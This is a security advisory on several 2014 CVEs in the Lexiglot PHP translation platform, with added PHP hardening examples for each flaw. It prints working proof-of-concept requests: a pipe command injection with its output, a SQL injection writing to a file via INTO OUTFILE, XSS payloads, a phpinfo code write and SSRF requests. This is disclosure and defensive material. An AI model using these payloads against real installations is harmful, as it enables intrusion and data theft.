JAHx181 - Piwigo lexiglot multiple vulnerabilities

Posted by Eldar Marcussen on Tue May 8 19:14:44 EDT 2018

This advisory somehow slipped between the cracks, but hey, 4 years late is better than never...right?

About

Lexiglot is a translation platform for PHP projects developed in PHP. -- http://piwigo.org/translate

Command injection

CVE-2014-8945

The username and password fields are vulnerable to command injection when adding a new project.

POST /vvv/lexiglot/admin.php?page=projects HTTP/1.1

name=test%7Cid&svn_url=http%3A%2F%2Fhost%3A8888%2Ftest%7Cid&svn_user=test%7Cid&svn_password=test%7Cid&files=1%2C2%2C3&rank=1&category_id=&add_project=Add

HTTP/1.1 200 OK
  string(53) "uid=33(www-data) gid=33(www-data) groups=33(www-data)"
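As an added illustration, not Lexiglot's own code, the following PHP contrasts the interpolated command line this advisory describes with one built from escaped arguments. Function names and the ./local/<name> checkout layout are assumptions.

```php
<?php
// Added example, not Lexiglot source. Contrasts the interpolated command
// line the advisory describes with one built from escaped arguments.
// Function names and the ./local/<name> layout are assumptions.

// Vulnerable pattern (constructed to mirror the advisory): form values are
// pasted straight into a shell command. "test|id" ends the svn command and
// runs "id" as the web server user, which is the output shown above.
function checkout_cmd_unsafe(string $url, string $user, string $pass, string $name): string
{
    return "svn checkout $url ./local/$name --revision HEAD --username $user --password $pass";
}

// Hardened: the project name is restricted to a safe character set and every
// value is wrapped with escapeshellarg(), so shell metacharacters ( | ; ` $ )
// reach svn as literal characters and nothing else is executed.
function checkout_cmd_safe(string $url, string $user, string $pass, string $name): string
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $name)) {
        throw new InvalidArgumentException('project name may only contain [A-Za-z0-9_-]');
    }
    return 'svn checkout ' . escapeshellarg($url) . ' ' . escapeshellarg("./local/$name")
        . ' --revision HEAD --username ' . escapeshellarg($user)
        . ' --password ' . escapeshellarg($pass);
}

$payload = 'test|id';
echo checkout_cmd_unsafe('http://host:8888/', $payload, $payload, 'test'), "\n";
echo checkout_cmd_safe('http://host:8888/', $payload, $payload, 'test'), "\n";
try {
    checkout_cmd_safe('http://host:8888/', 'user', 'pass', $payload);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```

Escaping the arguments only closes the injection; the password is still passed on the command line and therefore remains visible to other local users, which is the separate credential disclosure issue described further down in this advisory.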

SQL Injection

CVE-2014-8941

There are several SQL injection vulnerabilities in the project, for example:

~# curl 'http://192.168.58.134/vvv/lexiglot/admin.php?page=users&from_id=-1"+union+select+"abc"+into+outfile+"/tmp/winrar"+--+-'

POST /vvv/lexiglot/admin.php?page=history HTTP/1.1
Host: 192.168.58.134
Proxy-Connection: keep-alive
Content-Length: 79
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.58.134
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.58.134/vvv/lexiglot/admin.php
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: lexiglot_remember_me=2-1415751084-sV2wWGNLwVjAwGDxwhXcw4oemS8%3D; ck_login_id_20=1; ck_login_language_20=en_us; PHPSESSID=jqnd14cvtvddkf99t8d18ikr17

user_id=-1&language=-1&project=-1&status=-1&limit=1'&search=Search

Cross site request forgery

CVE-2014-8942

The SQL injection identified above can also be exploited through CSRF.
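The following PHP is an added example, not Lexiglot's own code, covering both the SQL injection and the CSRF issue above: the history parameters are validated and bound instead of concatenated, and state-changing POSTs are tied to a per-session token. Table and column names, and the `$session` array standing in for `$_SESSION`, are assumptions.

```php
<?php
// Added example, not Lexiglot source. Hardened handling for the history
// search and a per-session CSRF token for state-changing requests. Table
// and column names are assumptions chosen to mirror the request above.

// Vulnerable pattern (constructed to mirror the advisory): the raw request
// values are concatenated into SQL, so limit=1' or from_id=-1" union ...
// change the statement.
function history_sql_unsafe(array $in): string
{
    return 'SELECT * FROM history WHERE user_id = "' . $in['user_id']
        . '" LIMIT ' . $in['limit'];
}

// Hardened: integers are validated before use and bound with PDO::PARAM_INT,
// which also makes LIMIT safe (it cannot be a quoted string in MySQL).
function history_query_safe(PDO $db, array $in): array
{
    $userId = filter_var($in['user_id'] ?? null, FILTER_VALIDATE_INT);
    $limit  = filter_var($in['limit'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 500]]);
    if ($userId === false || $limit === false) {
        throw new InvalidArgumentException('user_id and limit must be integers');
    }
    $stmt = $db->prepare('SELECT * FROM history WHERE user_id = :uid LIMIT :lim');
    $stmt->bindValue(':uid', $userId, PDO::PARAM_INT);
    $stmt->bindValue(':lim', $limit, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// CSRF: a random token stored in the session and compared with hash_equals()
// on every POST. A cross-site form cannot read the token, so the forged
// request is rejected before any SQL runs. $session stands in for $_SESSION.
function csrf_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

function csrf_check(array $session, array $post): bool
{
    return isset($session['csrf'], $post['csrf'])
        && is_string($post['csrf'])
        && hash_equals($session['csrf'], $post['csrf']);
}

// Demonstration against an in-memory SQLite database (constructed data).
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE history (user_id INTEGER, action TEXT)');
$db->exec("INSERT INTO history VALUES (1, 'login')");
$session = [];
$token = csrf_token($session);
$good = ['csrf' => $token, 'user_id' => '1', 'limit' => '10'];
$bad  = ['user_id' => '-1', 'limit' => "1'"];   // no token, injected limit
var_dump(csrf_check($session, $good), csrf_check($session, $bad));
print_r(history_query_safe($db, $good));
try {
    history_query_safe($db, $bad);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```

The token check has to run on every state-changing handler, not only the history search; a single unprotected endpoint is enough for the CSRF path to remain open.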

Server side request forgery

CVE-2014-8943

The "add a project" page requests the URL supplied for an SVN repository to verify that it is a valid SVN repository. An attacker can abuse this to make the server issue requests on their behalf.

POST /vvv/lexiglot/admin.php?page=projects HTTP/1.1

name=test&svn_url=http%3A%2F%2Fhost%3A8888%2F&svn_user=test&svn_password=test&files=test&rank=1&category_id=&add_project=Add

HTTP/1.1 200 OK
  string(132) "svn: OPTIONS of 'http://host:8888': Could not read
  status line: connection was closed by server
 (http://host:8888)"
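One way to limit the server-side request above is to validate the repository URL before svn is ever invoked. This is an added example, not Lexiglot's own code; the function name and the injectable resolver are assumptions.

```php
<?php
// Added example, not Lexiglot source. Validates a user-supplied repository
// URL before the server contacts it. The resolver is injectable so the
// checks can be exercised offline; gethostbyname is the default.
function validate_repo_url(string $url, callable $resolve = 'gethostbyname'): string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        throw new InvalidArgumentException('malformed URL');
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https', 'svn'], true)) {
        throw new InvalidArgumentException('scheme not allowed');
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        throw new InvalidArgumentException('credentials in URL not allowed');
    }
    $host = $parts['host'];
    if (filter_var($host, FILTER_VALIDATE_IP)) {
        $ip = $host;
    } else {
        $ip = $resolve($host);
        if ($ip === $host) {   // gethostbyname returns its input unchanged on failure
            throw new InvalidArgumentException('host does not resolve');
        }
    }
    // Reject loopback, link-local, private and reserved ranges so the server
    // cannot be pointed at itself or at services on its internal network.
    if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
        throw new InvalidArgumentException('host resolves to a private or reserved address');
    }
    return $url;
}

// Constructed inputs: the resolver closures return fixed addresses.
$cases = [
    ['https://example.org/svn', fn($h) => '93.184.216.34'],   // public, accepted
    ['http://host:8888/',       fn($h) => '127.0.0.1'],       // loopback, rejected
    ['http://192.168.58.134/',  fn($h) => $h],                // private literal, rejected
    ['file:///etc/passwd',      fn($h) => $h],                // scheme, rejected
];
foreach ($cases as [$url, $resolver]) {
    try {
        echo 'ok       ', validate_repo_url($url, $resolver), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected ', $url, ': ', $e->getMessage(), "\n";
    }
}
```

Two caveats a practitioner would want: gethostbyname() only returns IPv4 answers, so a production check should resolve both address families, and a name can be resolved to a different address between this check and the svn call (DNS rebinding), so the fetch itself should also be pinned to the validated address or run from a host with no route to internal services.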

Cross site scripting

CVE-2014-8944

There are both persistent and reflected XSS issues in this project:

Reflected: Login with username a"><script>alert(1)</script>

Persistent: through the configuration interface, via the install_name, intro_message and new_file_content parameters:

POST /vvv/lexiglot/admin.php?page=config HTTP/1.1
Host: 192.168.58.134
Proxy-Connection: keep-alive
Content-Length: 435
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.58.134
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.58.134/vvv/lexiglot/admin.php?page=config
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: lexiglot_remember_me=2-1415755982-4D8DIXhWWhJEXJnq8Z%2BmNBJ%2BhSQ%3D; ck_login_id_20=1; ck_login_language_20=en_us; PHPSESSID=v97mnbctl9hlkc0564cgu7r034
X-FirePHP: 0.4.4
X-FirePHP-Version: 0.4.4
X-Wf-Max-Combined-Size: 262144

install_name=Lexiglot<script+src=xss>&intro_message=Welcome+on+your+new+installation+of+Lexiglot%21<script+src+xss2>&default_language=en_UK&var_name=lang&use_stats=1&use_talks=1&access_to_guest=1&allow_registration=1&allow_profile=1&user_can_add_language=1&user_default_language=own&user_default_project=all&language_default_user=all&project_default_user=all&new_file_content=%3C%3Fphp+phpinfo%28%29%3B+%3F%3E%2F%2FWAT&save_config=Save
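The fix for both the reflected and the stored case is the same: encode at output time, in every HTML context the value lands in. The PHP below is an added example, not Lexiglot's own code; the render function names are assumptions.

```php
<?php
// Added example, not Lexiglot source. Output encoding for the values the
// advisory shows being reflected (login username) or stored
// (install_name, intro_message). Function names are assumptions.

// Encode for an HTML text node or a double-quoted attribute value.
// ENT_QUOTES covers the "> that closes an attribute in the reflected case;
// ENT_SUBSTITUTE keeps invalid UTF-8 from making the encoder return "".
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// The login form echoes the submitted username only through h().
function render_login_form(string $username): string
{
    return '<input type="text" name="username" value="' . h($username) . '">';
}

// Configuration strings are stored as submitted and encoded on every
// render, so the stored payloads from the advisory come out inert.
function render_banner(string $installName, string $introMessage): string
{
    return '<h1>' . h($installName) . '</h1><p>' . h($introMessage) . '</p>';
}

// Constructed inputs mirroring the advisory's payloads.
echo render_login_form('a"><script>alert(1)</script>'), "\n";
echo render_banner('Lexiglot<script src=xss>', 'Welcome<script src=xss2>'), "\n";
```

h() is only correct for HTML body and quoted-attribute contexts; a value placed inside a script block, a URL or a CSS rule needs the encoder for that context instead.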

Denial of service

CVE-2014-8937

The api/update.php URL is publicly accessible and runs svn update on every registered project, which consumes significant resources and ties up a web server thread. Multiple simultaneous requests to this URL will cause resource exhaustion and render the web server inaccessible.
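An added example, not Lexiglot's own code, of the shape such an endpoint should have: it refuses unauthenticated callers and serialises runs with a non-blocking lock, so a burst of requests yields one svn run and many immediate refusals rather than many concurrent svn processes. The helper names and lock path are assumptions.

```php
<?php
// Added example, not Lexiglot source. Hardened shape for an update endpoint:
// it requires an authenticated administrator and serialises runs with a
// non-blocking lock so concurrent requests cannot pile up svn processes.
// Names (handle_update_request, lock path) are assumptions.

function acquire_update_lock(string $lockPath)
{
    $fh = fopen($lockPath, 'c');
    if ($fh === false) {
        return null;
    }
    // LOCK_NB: do not wait. A second request is told "busy" immediately
    // instead of occupying another web server thread until the first ends.
    if (!flock($fh, LOCK_EX | LOCK_NB)) {
        fclose($fh);
        return null;
    }
    return $fh;
}

function release_update_lock($fh): void
{
    flock($fh, LOCK_UN);
    fclose($fh);
}

// Returns [HTTP status, body]. $runUpdates would wrap the svn update loop.
function handle_update_request(bool $isAdmin, string $lockPath, callable $runUpdates): array
{
    if (!$isAdmin) {
        return [403, 'forbidden'];
    }
    $lock = acquire_update_lock($lockPath);
    if ($lock === null) {
        return [409, 'update already running'];
    }
    try {
        $runUpdates();
        return [200, 'ok'];
    } finally {
        release_update_lock($lock);
    }
}

// Demonstration: a second handle contends for the same lock while the
// first is held, then again after it is released.
$lockPath = sys_get_temp_dir() . '/lexiglot-update.lock';
$noop = function (): void {};
[$code, $msg] = handle_update_request(false, $lockPath, $noop);
echo "$code $msg\n";
$first = acquire_update_lock($lockPath);
[$code, $msg] = handle_update_request(true, $lockPath, $noop);
echo "$code $msg\n";
release_update_lock($first);
[$code, $msg] = handle_update_request(true, $lockPath, $noop);
echo "$code $msg\n";
```

flock() locks are held per open file description, so the contention shown here also holds between separate PHP worker processes, which is the case that matters for the web server.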

Local credential disclosure

CVE-2014-8938

The svn update function runs svn with the username and password as command line arguments. In shared environments, other users may be able to obtain these credentials by running the ps command:

~# ps auxw | grep svn
www-data 27662  0.0  0.4  12792  3548 ?        S    20:17   0:00 svn checkout  http://host:8888/ ./local/test --revision HEAD --username test --password test

Local path disclosure

CVE-2014-8939

The local filesystem path is disclosed by the following URL if PHP is configured to display warnings: include/smarty/plugins/modifier.date_format.php

Information disclosure

CVE-2014-8940

An attacker can access the /update.log URL to view all projects that have been updated. This can be used to leverage the aforementioned DoS attack, or to browse repository code, as projects are checked out to /local/projectname. Example:

~# GET http://localhost/vvv/lexiglot/update.log | head -1
[2014-11-08T11:58:10+01:00] rotateimage
~# GET http://localhost/vvv/lexiglot/local/rotateimage | head -10
<title>Index of /vvv/lexiglot/local/rotateimage</title>

<img src="/icons/folder.gif" alt="[DIR]"> <a href="ar_SA/">ar_SA/</a>

Solution

Upgrade to the latest version or seek an alternative, as the vendor deemed some of these issues acceptable.
